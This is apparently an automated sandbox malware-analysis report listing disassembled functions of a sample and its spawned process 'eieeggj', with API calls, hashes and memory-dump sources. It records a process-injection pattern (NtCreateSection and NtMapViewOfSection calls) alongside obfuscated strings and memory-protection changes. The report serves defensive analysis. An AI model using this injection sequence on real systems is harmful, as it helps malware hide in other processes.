Opcode Fuzzy Hash: 6ca32cdf93b1e4469b6275d5e289ac1cc41d2896c6b0d3dbe36aac65aa9808a5
Instruction Fuzzy Hash: D6D05E70A487015BDB244F39DD487E177A0FB11B36F309B4DD9A2894D1C7B994C68644

Uniqueness

Uniqueness Score: -1.00%

Function 00414036 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,?,?,?), ref: 00414047

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: dc6c6c5244a2ca52c26ba20d7627e0f525561a34784ee8e81aa3564fee935f7a
Instruction ID: 6f022b812ebf7ac7aabd8622a1002800d8283f582a77f7933469ea9fd41af9b1
Opcode Fuzzy Hash: dc6c6c5244a2ca52c26ba20d7627e0f525561a34784ee8e81aa3564fee935f7a
Instruction Fuzzy Hash: 29C0013200024DBB8F029F82EC0889A3F2AFB88360B088020FA28050208B33D931AB95

Uniqueness

Uniqueness Score: -1.00%

Function 0040B24C Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_0000020A), ref: 0040B251

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: bcdf79027474dc046bf2e2fdc02d6100152ec43418824010a4f51544ec31c735
Instruction ID: cf58ba85cbd96bcdd5efe8d85263a476cdb5055463fbfe9fee26e236906836a3
Opcode Fuzzy Hash: bcdf79027474dc046bf2e2fdc02d6100152ec43418824010a4f51544ec31c735
Instruction Fuzzy Hash: 1E9002A02A160147C6441770AC5D64925A09A4E612B9255B56025D44A5EB644054675D

Uniqueness

Uniqueness Score: -1.00%

Function 00418EAA Relevance: .5, Instructions: 528COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 220dc8517c9483f5387463d0c61580cadc6d9016bae37c2af06580fac0ccb870
Instruction ID: 2a1aab9fd115669428e623af9ebf9a252a32fcbb7d0e9318ff7f8b389062998d
Opcode Fuzzy Hash: 220dc8517c9483f5387463d0c61580cadc6d9016bae37c2af06580fac0ccb870
Instruction Fuzzy Hash: DF02E033C197B34B8B754EB940E05AB7EA05E0269031F87EADCD03F396C21ADD4996E4

Uniqueness

Uniqueness Score: -1.00%

Function 00419F7F Relevance: .4, Instructions: 384COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction ID: fd1d5850ea8749b425ab8439779b984e4ae5dba4bdc941510817ba054594b19a
Opcode Fuzzy Hash: 0666e2c6603716d584354562bcf590181c980fb8da26174d951f804026303a75
Instruction Fuzzy Hash: 44D15173C0B5B34A8735812D40681AFEE626FD269031EC3E2DCE43F389D52B5D9496D5

Uniqueness

Uniqueness Score: -1.00%

Function 00419B5F Relevance: .4, Instructions: 378COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction ID: 9d8cb249894975821d351e9f82a2da696aaa687611b31d0965e28e6e3fdff884
Opcode Fuzzy Hash: c40bcf876c129f9393d32ca3cb7471e4bcf7a4352579634fb414d11934eaa4f2
Instruction Fuzzy Hash: ABD16173D0EAB3468739812D40681BFEA626FD279031EC3E2DCE43F399D52A5D8196D4

Uniqueness

Uniqueness Score: -1.00%

Function 00419753 Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction ID: 29be284b333a97ddee5565faabfb44b04267eb82912d4e53276a1128f051dabc
Opcode Fuzzy Hash: 8709e21481f65d4d57cc4b3952fb3adbcebd3cc8b64ff3d20fdf858c0bfd14a0
Instruction Fuzzy Hash: 4EC15273C1A6B3468739812D40B81AFEA626FD269131EC3E2DCE43F389D12A5D8596D4

Uniqueness

Uniqueness Score: -1.00%

Function 0041937F Relevance: .4, Instructions: 351COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction ID: 251b4af9212e58417ea4b29b46e2ff5db82d2a65c4bdb511557a537517715336
Opcode Fuzzy Hash: a6a9d25a147ba64f4d06249d12fe21364a5b6889ab238d0ba2e949acfc497403
Instruction Fuzzy Hash: A3C18373D1A5B3468739852D40781AFEE626FD278031EC3E2DCE43F389D52A5D8186D4

Uniqueness

Uniqueness Score: -1.00%

Function 00403383 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2041818835.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_16GAuqLUFK.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 508928efc12ea53ba16f5eceb69b977d1092954aaf81a3fd271e1dfb049b9df2
Instruction ID: 9fb2590dc8210add171c8d6bc3e17b2f5c5ac2b4c45b95be75396bb1fc614592
Opcode Fuzzy Hash: 508928efc12ea53ba16f5eceb69b977d1092954aaf81a3fd271e1dfb049b9df2
Instruction Fuzzy Hash: 9A31376184C2C14FCB571E3408A45E5BF799EA332231952FBD8C1AB9E7DA3C4F0B9206

Uniqueness

Uniqueness Score: -1.00%

Function 0050DAA3 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042284755.000000000050D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0050D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_50d000_16GAuqLUFK.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: bf819ffd402e963ee79fdd49b40f11eed6288e91c3771d5778310f908ad7463e
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: DA1182723401019FDB44DF95DC81FAA77EAFB89320B298055ED08CB352D675EC02CB60

Uniqueness

Uniqueness Score: -1.00%

Function 004D0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2042153672.00000000004D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 004D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_16GAuqLUFK.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: c974dc4654c2c0b2856aceb322a8aa319b3ae388a02c1838a89238217a9a5fe3
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: CF01A7767006048FDF21CF64C914BAB33F6EB86315F4544ABD50697342E778A9418B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040DCBF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0040DD10
__copytlocinfo_nolock.LIBCMT ref: 0040DD38
__setlocale_nolock.LIBCMT ref: 0040DD4D
___removelocaleref.LIBCMT ref: 0040DD9A
_sync_legacy_variables_lk.LIBCMT ref: 0040DDD3

Strings

xLC, xrefs: 0040DDB1

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: ___removelocaleref__calloc_crt__copytlocinfo_nolock__setlocale_nolock_sync_legacy_variables_lk
String ID: xLC
API String ID: 611868054-381350105
Opcode ID: 86f6ba59649d68e1d3ab6d92d26d98441156c5ef99483970ac732cd66e0582db
Instruction ID: cd6a7387daaa6889dd3da9f550cccfc9ee4d024486082506333a7cf68692fd12
Opcode Fuzzy Hash: 86f6ba59649d68e1d3ab6d92d26d98441156c5ef99483970ac732cd66e0582db
Instruction Fuzzy Hash: 4A316171E047049BDB10BFA5D8827AE7BA0AF49318F10453FF4057A2C2CB7D9949D69D

Uniqueness

Uniqueness Score: -1.00%

Function 0040DBBD Relevance: 13.6, APIs: 9, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 0040DBD6

Part of subcall function 0040DEAD: Sleep.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00414F5F,?), ref: 0040DED5

__calloc_crt.LIBCMT ref: 0040DBFA
__calloc_crt.LIBCMT ref: 0040DC16
__copytlocinfo_nolock.LIBCMT ref: 0040DC3B
__setlocale_nolock.LIBCMT ref: 0040DC48
___removelocaleref.LIBCMT ref: 0040DC54
___freetlocinfo.LIBCMT ref: 0040DC5B
___removelocaleref.LIBCMT ref: 0040DC88
___freetlocinfo.LIBCMT ref: 0040DC8F

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: __calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock__setlocale_nolock
String ID:
API String ID: 1483262949-0
Opcode ID: 0e257c5be681744395716326b04fbe4d115a865b6ec359d6243cde99fb8085b3
Instruction ID: 5b91ec66f61a17bd136130c75f4d9022e7a644fc2cfb177896a2f6328bf06c44
Opcode Fuzzy Hash: 0e257c5be681744395716326b04fbe4d115a865b6ec359d6243cde99fb8085b3
Instruction Fuzzy Hash: 9B21D235508601EAE7227FAADC42D1A7BF4DF91718B20443FF4847A2D2DA3DAC44DA9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040D05A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(00000000), ref: 0040CFC3
___removelocaleref.LIBCMT ref: 0040D000
___freetlocinfo.LIBCMT ref: 0040D019

Strings

pFC, xrefs: 0040CFD0

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: DecrementInterlocked___freetlocinfo___removelocaleref
String ID: pFC
API String ID: 3247270073-3796257259
Opcode ID: e1bec6987670eebf973c37b56c6d5ce43dbbe1253d8ef5884ff4142fbd2649d1
Instruction ID: a498189872aee0b7005028b1247f6523023bed11f110077832b06a90b3a1ec65
Opcode Fuzzy Hash: e1bec6987670eebf973c37b56c6d5ce43dbbe1253d8ef5884ff4142fbd2649d1
Instruction Fuzzy Hash: BE11A331901305DADB306FA59846B1A77A69F44728F20453FF498FB2C2CB3CD981DA5D

Uniqueness

Uniqueness Score: -1.00%

Function 0041469D Relevance: 6.1, APIs: 4, Instructions: 71COMMON

Download Yara Rule

APIs

GetFileType.KERNEL32(?), ref: 004146D1
GetLastError.KERNEL32 ref: 004146DB
__alloc_osfhnd.LIBCMT ref: 00414703
__set_osfhnd.LIBCMT ref: 0041472D

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: ErrorFileLastType__alloc_osfhnd__set_osfhnd
String ID:
API String ID: 1633174738-0
Opcode ID: 1c60bf9ebbe5ba0b8de08884a65dc40613b4e8f9d27a456ed7a86900ca479c69
Instruction ID: 20b72c41b224bea48b6d4439250aff7cb983f2324a796c2b4184417b48f6576a
Opcode Fuzzy Hash: 1c60bf9ebbe5ba0b8de08884a65dc40613b4e8f9d27a456ed7a86900ca479c69
Instruction Fuzzy Hash: B921D6316012059ADB119F65C8057DE7FA0AF87328F18875AE8649B2D2C77C8AC1DF4D

Uniqueness

Uniqueness Score: -1.00%

Function 00428C08 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00428C2E

Part of subcall function 00428A16: __fltout2.LIBCMT ref: 00428A42

__cftog_l.LIBCMT ref: 00428C54
__cftoe_l.LIBCMT ref: 00428C86

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
Instruction ID: 241c89a9301580b6e7887e1e223602c0e6bcd1f15f875182ba213080e6c58095
Opcode Fuzzy Hash: afc8384d7de5dc81d749eb2ef2e502e72940c946d5071aaa17129bf9d5fb4602
Instruction Fuzzy Hash: 3811993214205DBBCF125E85EC01CEE3F26BB18354B98891AFE1855131DB3AC9B1AB99

Uniqueness

Uniqueness Score: -1.00%

Function 00427A10 Relevance: 6.0, APIs: 4, Instructions: 43threadCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(00431E48,00000000,00000000,00000000,00430010,00000000), ref: 00427A48
SetConsoleCursorInfo.KERNEL32(00000000,00000000,00000000), ref: 00427A6A
RtlExitUserThread.NTDLL(00000000), ref: 00427A72
SetFileShortNameA.KERNEL32(00000000,00431E80), ref: 00427A94

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: Name$ConsoleCursorExitFileFullInfoPathShortThreadUser
String ID:
API String ID: 3915137747-0
Opcode ID: b10cfd156464c0ca2c8b894a443df198905b2385de1b1817807ce9cff4f90754
Instruction ID: d035d980575495d5172214b24b9c6d5f6fc78bfe9c6a04701be60deba1f3baa8
Opcode Fuzzy Hash: b10cfd156464c0ca2c8b894a443df198905b2385de1b1817807ce9cff4f90754
Instruction Fuzzy Hash: A101D4716483109BE764A764FC17B6A33B4B748712F90213AF645931D0DF795844CB9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040F2A7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

__aulldvrm.LIBCMT ref: 0040F7C7

Strings

@, xrefs: 0040F2AB
@, xrefs: 0040F732

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: __aulldvrm
String ID: @$@
API String ID: 1302938615-149943524
Opcode ID: 8ac37ede4e14e66e0f839b025727a9e8fe8d9d5cfcb2d69c7678a814be3045f8
Instruction ID: f6e81578e32b952469933d4da95741b6ef3cbfbf3d64340cb7d7322e3e1360b7
Opcode Fuzzy Hash: 8ac37ede4e14e66e0f839b025727a9e8fe8d9d5cfcb2d69c7678a814be3045f8
Instruction Fuzzy Hash: 742184749001589BDB35DE54CC887AAB6B1AB94304F1445FBD109B7782D3B85EC9CF4A

Uniqueness

Uniqueness Score: -1.00%

Function 0040C689 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedDecrement.KERNEL32(?), ref: 0040C6E2
InterlockedIncrement.KERNEL32(00434A98), ref: 0040C70D

Strings

pFC, xrefs: 0040C6EC

Memory Dump Source

Source File: 00000000.00000002.2041895461.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_16GAuqLUFK.jbxd

Similarity

API ID: Interlocked$DecrementIncrement
String ID: pFC
API String ID: 2172605799-3796257259
Opcode ID: c18710712711ec31a6dad53811e2aa17e51cef7fce1f0f290b2c5ac4addb1a95
Instruction ID: 7df651b005818d3f1ed13df5d8aa103c5121289981c5fe45df5d7b365058972a
Opcode Fuzzy Hash: c18710712711ec31a6dad53811e2aa17e51cef7fce1f0f290b2c5ac4addb1a95
Instruction Fuzzy Hash: C101C432D00612DBD721AF959985B9E77A0AB44714F00163BE844733D1CB3DA942DFDD

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: eieeggjPID: 2884, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	3.4%
Dynamic/Decrypted Code Coverage:	18.7%
Signature Coverage:	0%
Total number of Nodes:	139
Total number of Limit Nodes:	7

Executed Functions

Function 00401590 Relevance: 10.7, APIs: 7, Instructions: 203
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
Instruction ID: d6964195f2ae178c179c3b7a32e304a619fe45f2cb2dcf097c8130f3d204b23e
Opcode Fuzzy Hash: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
Instruction Fuzzy Hash: 64616FB0904205FFEB208F91CC58FAF7BB8EF81710F10416AFA12BA1E5D6749941DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040159B Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
Instruction ID: ff81ed2e81490e93a7bfe721f9c6a4d9304ec08e35c355afa89281eda0ffd623
Opcode Fuzzy Hash: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
Instruction Fuzzy Hash: 3E5109B5900249BFEB208F91CC49FAB7BB8FF85710F144169FA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0 Relevance: 10.7, APIs: 7, Instructions: 169
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
Instruction ID: af686ae4933c2f6004de28669cc23aaadd0110c3f88d1b974755b8c34b4799b2
Opcode Fuzzy Hash: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
Instruction Fuzzy Hash: 0E51F9B5900249BFEB208F91CC48FAF7BB8FF85B10F104169FA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
Instruction ID: 765dedf92b6036aea99e2596c7c6646b0bcbba97602321f23575c560d9e65fb8
Opcode Fuzzy Hash: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
Instruction Fuzzy Hash: 1451E8B5900249BFEF208F91CC48FDF7BB8FF85B10F104169FA11AA2A5D6749945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004015CB Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000004.00000002.2279578621.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_400000_eieeggj.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
Instruction ID: 60f1a669064b898f2f8cfe764b4cdaf5e199705ebcb5ef48edc51869d28594cd
Opcode Fuzzy Hash: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
Instruction Fuzzy Hash: 2C51FAB1900249BFEF208F91CC48F9FBBB8FF85B10F104169FA11AA2A5D7749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00426F30 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 236
librarymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(00436E88,0BB7EA7B,4BBE82DD,2FC43CC7,52860AB1,6AD71B2C,43FE4454,34026A25), ref: 004277B9
VirtualProtect.KERNELBASE(0043738C,00438678,00000040,?), ref: 004277D4

Strings

:/X, xrefs: 0042726B
X2R, xrefs: 0042715F
R'._, xrefs: 00427330
)?u, xrefs: 00427645
v;^:, xrefs: 00427388
dFfX, xrefs: 00427255
U99x, xrefs: 00427092
6, xrefs: 004270A8
F(+, xrefs: 00426FEE
O8##, xrefs: 004271C4
o:?, xrefs: 004275CD

Memory Dump Source

Source File: 00000004.00000002.2279598268.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_40b000_eieeggj.jbxd

Similarity

API ID: LibraryLoadProtectVirtual
String ID: )?u$:/X$F(+$O8##$R'._$U99x$X2R$dFfX$v;^:$o:?$6
API String ID: 3279857687-975362989
Opcode ID: 4f582130c55c0daaa28ae105245a35626e2abde3df613d855247164ff8645d53
Instruction ID: 399b24f5a2b98565675b812eccd8896e7e81258963e30ea779c0b9d5388b49be
Opcode Fuzzy Hash: 4f582130c55c0daaa28ae105245a35626e2abde3df613d855247164ff8645d53
Instruction Fuzzy Hash: 4B02A7B400E385CFD2B09F46D68A78EBBE0BB91704F618A0CD5DD1A221CBB54589CF97

Uniqueness

Uniqueness Score: -1.00%

Function 0048003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0048024D

Strings

kernel32.dll, xrefs: 0048008F, 00480095
cess, xrefs: 0048018D

Memory Dump Source

Source File: 00000004.00000002.2279733437.0000000000480000.00000040.00001000.00020000.00000000.sdmp, Offset: 00480000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_480000_eieeggj.jbxd

Yara matches

Similarity

API ID: AllocVirtual
